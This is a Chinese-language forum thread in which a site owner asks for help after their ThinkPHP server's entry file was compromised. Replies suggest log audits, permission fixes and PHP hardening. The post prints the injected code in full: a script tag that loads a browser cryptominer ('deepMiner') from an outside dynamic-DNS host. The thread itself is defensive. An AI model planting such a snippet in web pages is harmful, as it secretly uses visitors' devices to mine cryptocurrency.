鍍金池/ 問答/PHP  Linux/ 服務器又被入侵

服務器又被入侵

使用 tp5.0 框架的入口文件被人寫入不知道啥玩意的東西

求大佬!!!

阿里云服務器

wdlinux 系統(tǒng)

clipboard.png

echo "<script src='https://greenindex.dynamic-dns.net/jqueryeasyui.js'></script>
        <script>
            var uri = 'www';
            var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
        if (!jqueryui.isMobile() && !jqueryui.didOptOut(14400)) {
            jqueryui.start();
        }
        </script>";
回答
編輯回答
舊言

1.下載https://greenindex.dynamic-dn...
2.在函數(shù)deAES中將返回的字符串輸出到控制臺中,這些字符串就是真正運行的代碼.
3.然后代入他下面寫的運行代碼,在中間調試.一步步調試 最多半天就能知道他干嘛的了.

2017年11月28日 07:29
編輯回答
夢若殤

你是是什么網(wǎng)站系統(tǒng)呀,用什么服務器呀,最近好多人都被入侵了呢。

2017年9月7日 04:30
編輯回答
臭榴蓮

先修改文件屬性,比如說把owner變成root:root

2018年8月8日 02:32
編輯回答
舊螢火

先找一找是哪里出現(xiàn)的漏洞,注入?。∥募? 然后看一下文件的權限

2018年3月30日 00:27
編輯回答
法克魷

先把日志摟出來審計一遍

2017年7月8日 23:13
編輯回答
陌上花

如果這代碼是入侵者留下的,可以告訴你,你的每一個用戶在幫他挖礦。

2017年4月6日 10:57
編輯回答
愛是癌

我覺得問題出在tp或者程序的可能性更大一些。

wdlinux wdcp的重點在控制面板,安全需要自己做。先推薦把php整一整,apache權限,其次是ssh端口,關ftp,防火墻等等。

屏蔽php高危函數(shù)
http://www.yunxi365.cn/index....

2017年4月8日 02:22
編輯回答
何蘇葉

最近留意到幾次這樣的入侵
請問樓主服務器上是否安裝了 FTP ?
電腦上使用的 FTP 客戶端是?
我懷疑是 FTP 客戶端上的后門

2017年9月19日 00:18
編輯回答
裸橙

樓主,我的也中招了!
不是用TP的。
但是也是使用wdcp這個來搭的。
也是直接在我的程序入口處加了你貼出的那段代碼。
查也查不到頭緒。不知道是從哪里黑進來的。

2017年4月19日 08:49
編輯回答
未命名

貌似挖礦用的
https://github.com/deepwn/dee...

2017年6月30日 00:13